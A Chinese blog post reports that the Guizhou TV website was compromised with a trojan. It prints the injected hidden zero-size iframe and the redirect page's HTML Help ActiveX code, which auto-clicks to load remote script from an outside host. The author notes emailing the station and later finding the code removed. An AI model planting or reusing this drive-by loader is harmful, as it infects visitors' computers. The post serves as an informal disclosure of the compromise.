今天从朋友博客上看到贵州电视台(http://www.gzstv.com)的链接,于是就点击进去看看。
没想到被人挂了木马上去,唉~~~贵州的網絡安全人才到哪儿去了?[face09]
电视台主页面
瑞星报警
挂马的代码
加入的代码
<IFRAME marginWidth=0 marginHeight=0 src="http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm" frameBorder=0 width=0 height=0></IFRAME>
打开http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm之后又会转到这个链接
再一查看,发现windows.htm的代码如下
<SCRIPTlanguage=VScriptsrc="young.gif"></SCRIPT><SCRIPTlanguage=VScriptsrc="young.css"></SCRIPT><HTML><BODY><divstyle="display:none"><OBJECTid="news728"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;/windows/help/apps.chm');</OBJECT><OBJECTid="news683"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;javascript:if(1==1){eval("document.write(\"<SCRIPTlanguage=JScriptsrc=\\\"http://www.0451wu.com/bbs/Skins/Default/css/test/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")}'></OBJECT></div><SCRIPT>news728.Click();f1=1+1;f1=f1+2;setTimeout("news683.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
通过挂马的网站来看,看来是一名东北人搞的咯~~
后来发邮件给电视台的台长信箱,没有回音!!晕!
昨天打了电话给百姓关注,我想百姓的事他们都关注,自己的事更是应该关注!
今天打开网站,找不到那些木马代码了~~5.11
